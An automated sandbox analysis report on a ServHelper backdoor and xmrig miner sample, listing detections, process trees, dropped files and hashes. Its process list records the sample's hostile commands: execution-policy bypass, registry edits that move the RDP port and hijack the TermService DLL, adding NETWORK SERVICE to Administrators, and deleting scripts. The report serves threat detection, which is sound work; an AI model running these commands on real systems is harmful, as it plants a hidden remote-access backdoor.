Malware Analysis Report

2024-10-19 04:37

Sample ID: 210914-rhbxhsaggq
Target: 608b93e344bd3dbb09d0af9da6856061
SHA256: 5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
Tags: servhelper xmrig backdoor miner persistence trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10
SHA256: 5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
Threat Level: Known bad

The file 608b93e344bd3dbb09d0af9da6856061 was found to be: Known bad.

Malicious Activity Summary

servhelper xmrig backdoor miner persistence trojan

xmrig

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Drops file in System32 directory

Drops file in Windows directory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2021-09-14 14:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2021-09-14 14:11
Reported: 2021-09-14 14:13
Platform: win7v20210408
Max time kernel: 6s
Max time network: 14s

Command Line

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe
    "C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2021-09-14 14:11
Reported: 2021-09-14 14:13
Platform: win10-en
Max time kernel: 82s
Max time network: 136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Signatures

ServHelper

trojan backdoor servhelper

xmrig

miner xmrig

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\SysWOW64\rdpclip.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasrv.png | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasvc.png | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3548 wrote to memory of 3644 | N/A | C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 3644 | N/A | C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 3644 | N/A | C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3748 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3644 wrote to memory of 3748 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3644 wrote to memory of 3748 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3748 wrote to memory of 3716 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3748 wrote to memory of 3716 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3748 wrote to memory of 3716 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3644 wrote to memory of 4080 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 4080 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 4080 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 424 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 424 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 424 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2172 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\net.exe
PID 3644 wrote to memory of 2172 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\net.exe
PID 3644 wrote to memory of 2172 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\net.exe
PID 2172 wrote to memory of 2784 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 2172 wrote to memory of 2784 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 2172 wrote to memory of 2784 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 584 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 584 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 584 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 740 wrote to memory of 696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 740 wrote to memory of 696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 696 wrote to memory of 1312 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 1312 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 1312 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 1456 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1456 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1456 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 1572 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 1544 wrote to memory of 1572 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 1544 wrote to memory of 1572 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 1572 wrote to memory of 1592 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1572 wrote to memory of 1592 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1572 wrote to memory of 1592 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 2264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 2264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 2264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe
    "C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BBB.tmp" "c:\Users\Admin\AppData\Local\Temp\zboakoxb\CSC6678B83EFD544333B99B4AFEEE122FE.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe
    cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe
    net start rdpdr

C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe
    cmd /c net start TermService

C:\Windows\SysWOW64\net.exe
    net start TermService

C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

N/A

Files

memory/3548-115-0x0000000005120000-0x000000000551F000-memory.dmp

memory/3548-117-0x0000000005A20000-0x0000000005A21000-memory.dmp

memory/3548-118-0x0000000005750000-0x0000000005751000-memory.dmp

memory/3548-119-0x0000000004D00000-0x0000000004D01000-memory.dmp

memory/3548-120-0x0000000004D02000-0x0000000004D03000-memory.dmp

memory/3548-121-0x0000000004D03000-0x0000000004D04000-memory.dmp

memory/3548-122-0x00000000058C0000-0x00000000058C1000-memory.dmp

memory/3548-123-0x0000000007C00000-0x0000000007C01000-memory.dmp

memory/3548-124-0x0000000004D04000-0x0000000004D05000-memory.dmp

memory/3644-125-0x0000000000000000-mapping.dmp

memory/3644-128-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

memory/3644-129-0x0000000006D00000-0x0000000006D01000-memory.dmp

memory/3644-131-0x00000000066C2000-0x00000000066C3000-memory.dmp

memory/3644-130-0x00000000066C0000-0x00000000066C1000-memory.dmp

memory/3644-132-0x0000000006C30000-0x0000000006C31000-memory.dmp

memory/3644-133-0x0000000007330000-0x0000000007331000-memory.dmp

memory/3644-135-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/3644-136-0x0000000007400000-0x0000000007401000-memory.dmp

memory/3644-137-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

memory/3644-138-0x0000000007D20000-0x0000000007D21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/3644-144-0x0000000009380000-0x0000000009381000-memory.dmp

memory/3644-145-0x0000000008A20000-0x0000000008A21000-memory.dmp

memory/3748-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.cmdline

MD5 d0ca721556c0aecac84c63153d13ac60
SHA1 141718caaa783b7114956ea839226442453e4852
SHA256 2a94500f7cddc780b6bb28564b11724d696c4b90832a453d4c40a4f392ca7c16
SHA512 7b89f9cd9353f335231df0b192370de56d9d8f5b192574008f52d82dcd0568e940fd2403faa7d3209333f236c3e0a1bf552ff826a46c631c7ebe969b02b77e84

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3716-149-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\CSC6678B83EFD544333B99B4AFEEE122FE.TMP

MD5 9884cdfdca445f9245a876aca44eeb2f
SHA1 6e5b60de8171e1e7d04437cb038bde7cd58d196f
SHA256 9adbafb99cceabee6e76d625d9811e9354596df7b2b6d4cde6879dff38d2c9e0
SHA512 0ccff0c200aa0a6bbc3e36bd001bfe938c499a173a0a9a19ce2e87cbdcf55d86a6a093f4f9c8d18666b0d20443bfeea55b99ffef16036f569fb9b4bbeba57941

C:\Users\Admin\AppData\Local\Temp\RES1BBB.tmp

MD5 261cb7114baae3ece6e3cf0d34d687c1
SHA1 34fef5e12d4ea071c445862555ccb86efe896ea3
SHA256 a998df994f127c87295e1dc1343ec203d4399d2b822f781848acd3eaf01282f0
SHA512 025c3fec8d259ba9d6c35dd787052b74260f45a9a7bb69ea2bea3ad28ca799d6816d7ef65a9ee571c42f38ec2741fec5c7e08cfa9915e79037c8504539225016

C:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.dll

MD5 d3edbd045bfff76d67b2c22e68b97e13
SHA1 a072ccca2930d907a4b0cc33a76dd58711aa4a3e
SHA256 d520a040375f61b848f15f118743ddd3bd4e0d472951480b0341ebb603d76e90
SHA512 09ce18f829790f7b61016e4b58367441efb770e708e83e3cc3f23a45f21652c8a99a91920d2b448a073409fdf6200868be1c5e6c1547f46762abd49defce9969

memory/3644-153-0x0000000008AA0000-0x0000000008AA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 794bf0ae26a7efb0c516cf4a7692c501
SHA1 c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA256 97753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA512 20c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75

memory/3644-155-0x00000000066C3000-0x00000000066C4000-memory.dmp

memory/3644-176-0x0000000008E00000-0x0000000008E01000-memory.dmp

memory/4080-177-0x0000000000000000-mapping.dmp

memory/4080-186-0x0000000004670000-0x0000000004671000-memory.dmp

memory/4080-187-0x0000000004672000-0x0000000004673000-memory.dmp

memory/4080-198-0x0000000008850000-0x0000000008883000-memory.dmp

memory/4080-206-0x0000000008830000-0x0000000008831000-memory.dmp

memory/4080-211-0x0000000008990000-0x0000000008991000-memory.dmp

memory/4080-212-0x0000000008B40000-0x0000000008B41000-memory.dmp

memory/4080-213-0x000000007E860000-0x000000007E861000-memory.dmp

memory/4080-406-0x0000000008AE0000-0x0000000008AE1000-memory.dmp

memory/4080-412-0x0000000008AD0000-0x0000000008AD1000-memory.dmp

memory/2460-432-0x0000000000000000-mapping.dmp

memory/2460-442-0x00000000045B0000-0x00000000045B1000-memory.dmp

memory/2460-444-0x00000000045B2000-0x00000000045B3000-memory.dmp

memory/2460-536-0x000000007F000000-0x000000007F001000-memory.dmp

memory/3688-683-0x0000000000000000-mapping.dmp

memory/3688-699-0x0000000004D90000-0x0000000004D91000-memory.dmp

memory/3688-700-0x0000000004D92000-0x0000000004D93000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 f3068198b62b4b70404ec46694d632be
SHA1 7b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256 bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512 ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

memory/3688-744-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/424-962-0x0000000000000000-mapping.dmp

memory/1012-963-0x0000000000000000-mapping.dmp

memory/2364-964-0x0000000000000000-mapping.dmp

memory/2172-1001-0x0000000000000000-mapping.dmp

memory/2784-1002-0x0000000000000000-mapping.dmp

memory/584-1005-0x0000000000000000-mapping.dmp

memory/740-1006-0x0000000000000000-mapping.dmp

memory/696-1007-0x0000000000000000-mapping.dmp

memory/1312-1008-0x0000000000000000-mapping.dmp

memory/1456-1009-0x0000000000000000-mapping.dmp

memory/1544-1010-0x0000000000000000-mapping.dmp

memory/1572-1011-0x0000000000000000-mapping.dmp

memory/1592-1012-0x0000000000000000-mapping.dmp

memory/2264-1025-0x0000000000000000-mapping.dmp

memory/1012-1026-0x0000000000000000-mapping.dmp

memory/3644-1053-0x000000007EDD0000-0x000000007EDD1000-memory.dmp